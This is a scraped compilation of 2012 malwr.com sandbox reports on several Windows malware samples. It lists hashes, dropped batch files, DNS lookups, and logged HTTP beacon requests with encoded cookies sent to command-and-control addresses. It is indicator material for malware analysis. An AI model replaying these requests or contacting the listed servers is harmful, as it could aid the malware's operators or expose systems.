malwr.com/analysis/a39517b9d610d58563e5bc93c52c8a79/ 3 Sep 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of d6b6378be852d33c0b733d3cb3b0a510 malwr.com/analysis/d6b6378be852d33c0b733d3cb3b0a510/ 23 Aug 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of 164bcbf8e2fb68ae6f1cbaaebc02c8d0 malwr.com/analysis/164bcbf8e2fb68ae6f1cbaaebc02c8d0/ 30 Aug 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of 1d018731db7a0c0efc17dd057246cce7 malwr.com/analysis/1d018731db7a0c0efc17dd057246cce7/Share 15 Aug 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... site:malwr.com /videos/forumdisplay.php Malwr - Analysis of f6b2c8b2137b4d3e94a746c7cd5741ed malwr.com/analysis/f6b2c8b2137b4d3e94a746c7cd5741ed/ 27 Sep 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 36733a3a399d11c1dfcc2a61b030d788 malwr.com/analysis/36733a3a399d11c1dfcc2a61b030d788/ 5 days ago GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=Igqiag-l6NgoBapnG1fBvI4AXDtoXeMCt31egFTFOHMfhkFMI-A; ... Malwr - Analysis of a86e83dcb3067cf5b6c12a9da0b44fa2 malwr.com/analysis/a86e83dcb3067cf5b6c12a9da0b44fa2/ 26 Sep 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of bb633fa638107050380c821cee9d61cf malwr.com/analysis/bb633fa638107050380c821cee9d61cf/ 19 Sep 2012 GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=sY0KOU6YggP5tpyzv27GTlm6OHknI; ... Malwr - Analysis of a39517b9d610d58563e5bc93c52c8a79 malwr.com/analysis/a39517b9d610d58563e5bc93c52c8a79/ 3 Sep 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of d6b6378be852d33c0b733d3cb3b0a510 malwr.com/analysis/d6b6378be852d33c0b733d3cb3b0a510/ 23 Aug 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 164bcbf8e2fb68ae6f1cbaaebc02c8d0 malwr.com/analysis/164bcbf8e2fb68ae6f1cbaaebc02c8d0/ 30 Aug 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 1d018731db7a0c0efc17dd057246cce7 malwr.com/analysis/1d018731db7a0c0efc17dd057246cce7/ 15 Aug 2012 URL, Data. http://88.216.164.117/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of bc5c5477ca82aad5fb679c189631f4ee malwr.com/analysis/bc5c5477ca82aad5fb679c189631f4ee/ 29 May 2012 GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=dVJKvl8JhYiRHWIGeilCcyWTSYWrIa1KMa7tm-HeQgxsEMnA; ... Malwr - Analysis of a6f1e990f32802809de31dd6bc2458ca malwr.com/analysis/a6f1e990f32802809de31dd6bc2458ca/Share 11 May 2012 URL, Data. http://77.79.11.29/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of dcc58dc39c96e468332a3642c74b453e malwr.com/analysis/dcc58dc39c96e468332a3642c74b453e/ 25 May 2012 URL, Data. http://77.79.11.29/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 934e24539e31a963c02211f8aa3a774e malwr.com/analysis/934e24539e31a963c02211f8aa3a774e/ 12 Jun 2012 URL, Data. http://77.79.11.29/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 51b17db5d805fc5cf1566b9ee6c31be5 malwr.com/analysis/51b17db5d805fc5cf1566b9ee6c31be5/ 12 Apr 2012 URL, Data. http://77.79.11.29/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... Malwr - Analysis of 970e1dda56dfb961c07e69dcf06cd716 malwr.com/analysis/970e1dda56dfb961c07e69dcf06cd716/ 17 May 2012 GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=GTzPnKRo77CA_F83onPrNS0; ... Malwr - Analysis of ad3f3c124a66ff8aea5f5523a2678145 malwr.com/analysis/ad3f3c124a66ff8aea5f5523a2678145/Share 19 Mar 2012 URL, Data. http://77.79.11.29/videos/forumdisplay.php, GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: ... -------------------------------------------------------------------------------- http://malwr.com/analysis/ad3f3c124a66ff8aea5f5523a2678145/ File Details Analysis Package: Default analysis of Windows PE32 executables Analyzed on: 2012-03-19 05:45:02 PST Duration: 165 seconds File name: bing_creative_solutions.com.octet-stream File size: 372224 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: ad3f3c124a66ff8aea5f5523a2678145 SHA1: 9b790d5401e45e7fe6cde3cbb618aecd84cfa546 SHA256: cb194b381e0716516ab476346a1fec8438b99ecc701bf85856b6cd74422b7c61 SHA512: 0df74d89fd873ebc1ee3b641d60ea71ad2fca2b47684eb1c26fbb635bf4839107fa9474ae60d14ac6b701d221d4fc41bf1cb735b2067d7f0190e9ccfdec7483a CRC32: 4C9BA59D Ssdeep: 6144:KYUDjilPOFR9I0uBlh6o+z2aWJqu7KsEECBp7YKXJkvgnw4:KY2jilOR9IRcozJV7KXrBpPr Network Analysis DNS Requests + Hostname IP Address somethingclosely.com 230.2.177.239 HTTP Requests + URL Data http://77.79.11.29/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=4Wq4vevdurhUDF9tayqRAcN1lngKemUlcoCdO3vwI_51mAQVsK; clogid=cldP5oXRslFabxDXtGCn3NQfZfUnrFkhid_d6FDJlz863qljo65kkszlOpEhhCb8hAW; nonsession=Q; id=HsLEKMvp18mMurRb29W5g7B4fpgyBzLU7WHMGYYiafbOPxzJbJ7euEEy8GzzHA2ed74l_DxaeQcF9118y6REzA5Swpvrn9GIK-IOV2EznCimZ_sU9uLct1KOgAo1ldTfGwIxy9ycMrhezXqvhpQiRW3wAGxRiRYYeEtOPLfFrvXld2kU4SauR5-EbHU6Nb1J9W0zfZU8Kk8tp05A61uFH-t5ITxCBY82Jluq1bvB-xyWUCKFpIhuvMDxFTYWxc6AqThEh3FSzNYDv_YwYYP3ZtAFVs3PgmQuzjCDEu89ToATEictWNZ51xVNtgCqDnwv7j7DE7pPmhjZ1RhbFRUyyBZWRtwNsRSpJ8FgN9KTFWS4tZYdui0Nbn9ZZ4Oe5hgBA9KZWrAdRWpvOU1A1d5AUa11AMYOTdQlukgcJHEWmY4ot-Gxs7byvKbkSlAQfZJVH7KJ6cnADY9Yn0BEaCrZfH2Bn-9bzq9kTk4-v_ClhNJqxjhAhV-zX User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 77.79.11.29 Connection: Close Cache-Control: no-cache Pragma: no-cache http://77.79.11.29/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=OapEPympBzbW09Gt5ZnJORpJeWWCu_kroZzxl5OtH45FBTslTWeLVuGTusWta65CsZ6AyIRSx1yyfq4whqM1WuWtsv_mgsnLTuGwUHI7B0JwlTs5SJIrM5hTgR1XfVdRI6w_LfWZpiFQ5HCTKar2l7dy3pmI5JTXGfOZXbHr4lVHhhrf4vsl_k9; clogid=whNaRNfwnYDhir6Zmoik2FIX3BLsEy1bh__k6plDlrod-d1tkThSJACl1QsmLxHEAOpdO5UZ6SoLYft_2th8bTlXlDvkjkOX0ZvB4W5xwLCkkw2FR9R-ovI124VZOH-IdqXQ4DNZcQG0L0dhQ43v9WMEgd32bd97PaN9o2qdioTHZfTV_GaDFzLRmLm1Sho95S0zaBZfLJLAj409uYgj3zqqrl14nQ1psozmYywniBvkUvn7cB0WrYihsZAzhHJ0; ARSiteUser=server=g0sfnBqo9CgOjADcxUwKkAPpnOmiPcJr; _thepoint=YJzcYUgysUy8hxNJpyJ0gNuqK9vZC8l6mxQeGPbIR5XJp7JCYR8Kn_R-SPIv02lOBeMG473i_sHJBnwt56X3jwUii3uWNDZCCn0xMc9Uc452Zoic8WRvxdRn_dH9HyXsXlwznbmt7WCu36s0IUBxPVTB2-1T4UV8bXdmkseXcKFSBfZQezZ8x3TVpcwCziuu2Edndyj_v5u3a3cgoHCY131i8qX2N2HKm21_fwJ8Ior03qiVns1gsVJVq5aMr9ar2Z4JrjRimOlWUXoqyaMT7lsEMcQK2cN_6UI9r8SFOKBMqKJLDo6ZE8MI6xl-Js3Rd4HQhIbhI7Z9CC9YKADP54Ou-D6X9jKe1jWEGEcfaqMXhDTxTyM9jYNmjdQzGdLMIsJWVHbE-0hOTPnJacyGMb4j0g--6yVMC723hJVUiDzSufq3yrx7gBXLkrzx5dWa6oDQmFrl User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 77.79.11.29 Connection: Close Cache-Control: no-cache Pragma: no-cache Dropped Files File: ~unins3613.bat + File size: 49 bytes File type: DOS batch file text MD5: 9e0a2f5ab30517809b95a1ff1dd98c53 SHA1: 5c1eefdf10e67d1e9216e2e3f5e92352d583c9ce SHA256: 97ac9fee75a1f7b63b3115e9c4fb9dda80b1caba26d2fb51325670dee261fe32 SHA512: e959cc1fd48fb1cccf135a697924c775a3812bab211fc7f9b00c5a9d617261d84c5d6f7cb548774c1e8f46811b06ca39c5603d0e10cbcb7b805f9abbe49b9b42 CRC32: 30096EA5 Ssdeep: 3:mKDDryGAdPfeZ2sn:hRAdOxn File: bing_creative_solutions.com.octet-stream + File size: 372224 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: ad3f3c124a66ff8aea5f5523a2678145 SHA1: 9b790d5401e45e7fe6cde3cbb618aecd84cfa546 SHA256: cb194b381e0716516ab476346a1fec8438b99ecc701bf85856b6cd74422b7c61 SHA512: 0df74d89fd873ebc1ee3b641d60ea71ad2fca2b47684eb1c26fbb635bf4839107fa9474ae60d14ac6b701d221d4fc41bf1cb735b2067d7f0190e9ccfdec7483a CRC32: 4C9BA59D Ssdeep: 6144:KYUDjilPOFR9I0uBlh6o+z2aWJqu7KsEECBp7YKXJkvgnw4:KY2jilOR9IRcozJV7KXrBpPr -------------------------------------------------------------------------------- http://malwr.com/analysis/f6b2c8b2137b4d3e94a746c7cd5741ed/ File Details Analysis Package: None specified, automatically selected Analyzed on: 2012-09-27 06:57:02 PST Duration: 23 seconds File name: 21873332604_2.exe File size: 602112 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: f6b2c8b2137b4d3e94a746c7cd5741ed SHA1: 16e72584df761e0f74ec03908377166d4f6044c1 SHA256: 57d72160c280688c8103d972ce106736af69dadb4be335b54e8bc8dd9114a40f SHA512: 77dbcdeb389a6371cbce1b600c44a499cd1c2296d8c199d2f24d2d478f67b48c23bc04ed9da56f5bae76196699e40d5d4703b78f45bb37c3e7bca22d129f9982 CRC32: 962F8F81 Ssdeep: 12288:hf5p1FaRl02Hxq92zAmTai2tUf7JRFY/jH6Hf2U45:J5DFaRl02RqRmeElHYjCf2P Analysis Errors [2012-09-27 06:57:25,492] [Core.DumpFiles] ERROR: Something went wrong while dumping file from "C:\WINDOWS\system32\exporte.exe" to "C:\cuckoo\files": [Errno 13] Permission denied: 'C:\\WINDOWS\\system32\\exporte.exe'. Network Analysis DNS Requests + Hostname IP Address intohave.com 64.179.44.188 HTTP Requests + URL Data http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=l8l-fYKOVA86OotktzgnWKpU4JMwUWg5ynj8Sfn2H9LUhRCzYYbK6as0tvoHB78GDuQ5bcwtpRA6OGPZh0a_U2BqNsQ-KNl6VzlBJbJi8HtJXGbAiTkOTeDKY9H; clogid=Y1H0gn8iMRP95DviMNTMyXxdrxLVD-tO4nQitIPFTvBMprGb1gqLQxlwGXCvrhPJBP_x17w6mdijxXJ7IEsSlSvxYlSA8G4Fxcw1ExZFf7rXNH_4nkTNihVIWmRg95llAyLhBTOYfUo_FYHvE37OIv19GxHrPmBaQ2rcyNbamCuEkhmz0W51zI; nonsession=h6; id=HvOdyPgrdwCAONjdFeDDB8OPK76QMY7-n-M5ZlbC4iXO1u3qqGoxXAi_qJM_P5H2Ies_Y6SgJozjzuc39SvVhIU9XVu0P7oGiCXunaePk0yYKYvOQvyyDLSzJVck2rb7o3K8AbabxHPfCxad1_KQ624C5xOkXs_RsRikI_n8bpZOCBnErpDchYOO6Kz8YfeUpj-qZhd8oUaL1H28qeaWx2bRAyckHM_MlltkzjO-GjesXquN4ZnwtqKFaMnBZYZIM99aNG-KC4Yr8J88eGD_GX0iE4yo49NwNDdEF8Nh2dsoOCgQy5wS0WCM3 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=VMFqz-k7OZsw8WKeL-hBba3DxzuTd5MvrJ-tzxhT798D_ksJfI_Wm5pxKzVb7US-rAKGNmSNpg7LQbB4PdZjuEgP9vtA5a6v; clogid=34stXpMIzAgy0eyEXJ5KvX-YCJh3kwxyPwdiHu580bTTYvfQxkxCY7dgc30iUtCDsFxR6_BSc0cUPzKkMzBCEym5SPClmecZDq2R2siYnMDNlkMERC; ARSiteUser=server=Ln-psbjVDZUwjPTXvVtRQ0e9wovM99NOzUJulc1DzR-kJq4cOUCTVFCqWw6K1c7xoLkpPeG-yvwj05LHSe7cKt_lYZv-1E; _thepoint=60q7zyJH7RyTrBgYHYtPB5Z-W629bfjAuIvvPSXUSwxn268guEbeZjKSAoDYTrBELDxJO21KIb4avyFj6jkYRI14Jm5jxMmVAbVQsAhhgF0dip2Rx9ldRx4NLSu5LwS7ZaGqcB_EoPX-ZpLvJ3O7-bA38xmY-gumC9uDpHZIwjX4xJswoW6iEx2QV7vkh2F0NvSct9Ni3_a496s0I13GDj348HtzwSBqqR4ntxvXd2n52uRLXXzSSt8nW6wQDdHLlXFT8VZkINYbJKdX6j1ao5Rc73jLaZ60k0F9QjTxG55ehGlgrieneqg-c66xRODPjhSehKLzpzDk-hV4cXRj5dD_Yy5J1kfy329RRzMAuywet5W4NDDy7TMsGllaL_mU3Mxk-I6NvruMwViPN9y-ahWpxuZTFWTqSlLJp9-Jm6DB0xATJbUm9ZQcWJQWrAwVxp4qRjXd97OKvO8Mz-OijSPpQZO4UEOgXrGbk1jh4qoRk12omJwf3TQYnF8GCceryoM3NMx8l7C3jRj936tRERNeTrrctxwOrcqAOOfZQxXbpov7qY5JV84UVxBz6gyOJeAWXHvL7uMVIWCrxuj9otTz9nOSMSqxALPnUl5_LXWeKtpr User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache -------------------------------------------------------------------------------- http://malwr.com/analysis/a39517b9d610d58563e5bc93c52c8a79/ File Details Analysis Package: None specified, automatically selected Analyzed on: 2012-09-03 02:57:47 PST Duration: 23 seconds File name: st.buymeaslut.com--030912-102812-suricata-file.3239.exe File size: 659456 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: a39517b9d610d58563e5bc93c52c8a79 SHA1: 18b65feac96b35ccc6bb4c633e312a6bad6ca5dd SHA256: 4aaffa674330ab7d66497bc18dbebcc9d80ef1066dda3c405c8c80e222dc044c SHA512: 03b4f2bc0a98f884822959565229c4c297a6f34f068cee6e4841d7dea593b130a4e4949190b6e009c3b1613e79b5faa2362235e4024678bb508736042dc89ddd CRC32: 0340C156 Ssdeep: 12288:raTLoKIZLbJc9fzUuaoia5hyImaHGnLsviNvN5NSxxbh4lcPyKaW:rIkydzUu53fGL+iNF58vh6Rv Dropped Files File: st.buymeaslut.com--030912-102812-suricata-file.3239.exe + File size: 659456 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: a39517b9d610d58563e5bc93c52c8a79 SHA1: 18b65feac96b35ccc6bb4c633e312a6bad6ca5dd SHA256: 4aaffa674330ab7d66497bc18dbebcc9d80ef1066dda3c405c8c80e222dc044c SHA512: 03b4f2bc0a98f884822959565229c4c297a6f34f068cee6e4841d7dea593b130a4e4949190b6e009c3b1613e79b5faa2362235e4024678bb508736042dc89ddd CRC32: 0340C156 Ssdeep: 12288:raTLoKIZLbJc9fzUuaoia5hyImaHGnLsviNvN5NSxxbh4lcPyKaW:rIkydzUu53fGL+iNF58vh6Rv File: ~unins1510.bat + File size: 49 bytes File type: DOS batch file text MD5: 9e0a2f5ab30517809b95a1ff1dd98c53 SHA1: 5c1eefdf10e67d1e9216e2e3f5e92352d583c9ce SHA256: 97ac9fee75a1f7b63b3115e9c4fb9dda80b1caba26d2fb51325670dee261fe32 SHA512: e959cc1fd48fb1cccf135a697924c775a3812bab211fc7f9b00c5a9d617261d84c5d6f7cb548774c1e8f46811b06ca39c5603d0e10cbcb7b805f9abbe49b9b42 CRC32: 30096EA5 Ssdeep: 3:mKDDryGAdPfeZ2sn:hRAdOxn Network Analysis DNS Requests + Hostname IP Address intohave.com 64.179.44.188 HTTP Requests + URL Data http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=t5v0qHhRvFGojlCjccEDgnKyOmGFaMdlDNgesxGaijSN_l7MfNp2PaPFliKHnFNUkYSz7Tcq3uZWaolxnTERYKLAn; clogid=5ITxa2w7leKWupvNI9Ty6j4oKCZlnpKDCYDsavtp6I1QMNYeBWI6ZrEPKIDvjfoJaPPfJ8pgp4L-dYsF4jv_XJd0rzBSabb_SH; ARSiteUser=server=79HcQOwKbKL5R9mP32J0zmEHdDGyYXfvDwlDAXQt3Kun4; _thepoint=cHoaTBpHpwCNW7QY8ZAJo525TOWAHn60FIuot5ea6X4gvt21DLroiJK4QnrlT4xJ-ov4d1-b7ae71RXQZnTSlLnpWfDHiKcQNfORjoLjTBrsrI1zG5xWgLzsaPKKBEXQBB78c7N2mcioy7mBSgwIzys511gxX8UmseKQFfwK5YrWcuz_6rANoolECwzzNOxp9jhYO04bBrVOvkxsMQturJsoXCbRPV31WAuHGUhR3fbvIBzCj7HJOMyZqyXxGtsfSttNkaLjc-AQ3JYBmg0kKWpOksBXT5ga5tyZmkYFttsLSfY7qD7sop03b9RJrlBhJWLtsl8JUz0JnTHzbGJbnUDumI5yk54V5LdyCyu8YOQ5135412GvFVkH71ynNxMigHBS User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=baIRo1G105nEGT4kVZRt2_auQ_D_1bHB172BGblV9Mf8c-hZZV9a9Pg_2o79o_OST-JZmJKEdEjBkI9F0CYs8YQnAbluSpMwctQHV-5YzLO4oSQX98DrgdCukA5dEw9rOXr5; clogid=Fwcahofh2n1cv49XdVubBUF4pPdjC1JkYiFox31SZOIMdVEa-syl8nzKI77HK7_JlcRl7H3ybfwivk5ijZPLFreq6OsOohEv2Echf8cgEQdn8xQ-IixjUqNEBMPvo605oUBBDxQWLvoyVq6AG50QKL3fbADhClJwp5Z0Ha1NjVMQVVmTeTtlxE6__kbsJb6giD3u__NFy-nKGgvafgEA4emcg-HXOLZ_P; ARSiteUser=server=-_Fi; _thepoint=KGdNqDuk47ro4kiGI3ObXW5AAdGiAp7OJoPS6cZp0P7j-B81JBhLlIDaKez-BoN0RQGQ4Ii_FcsfBDUTaJxikaUqhqDcEAWtxDeb5UEKiUMFIr7eAx4eJwFzbQz_zJWQ_L5V3HjUnsbNPukwIwQXp7WUhFVF37q0SG107vM77xO-N3IlYzl5J1EIyzRtZrtlaK4G30p03F1fT3eBaZ46yolLc76EWknepE_hTIBR4LYdoZYlR8r7hpyBa3Ah17_FLiYRaXX8GqcXxAAexZuL6nukDSU7jrwCdMPxghkx9jM-ZjpcyzFHn72AbfV0mDVDu5ALWY4wDHfxurXjB-DXUn4RSJLn2S4yttpsdLDZmwRP3klegtFDQ6ci7pbOQKGlXaPM2XiGKcTG-nJapyp3plrcfU2xf1CztK9G5-JrakuRHQzB5bkG22VbAtTG7gbLyfZxePodppB4X8Gm53bzOw4O_j0k1xVzD9d4q75Paz9Wi_wBzd7rIUOvZbEqegEc_LHkt4wwH5mvpuQwp-rKcyXLJ-1NCqVpOlfv7cg4oW--TFb2XSeVnrI User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache --------------------------------------------------------------------------------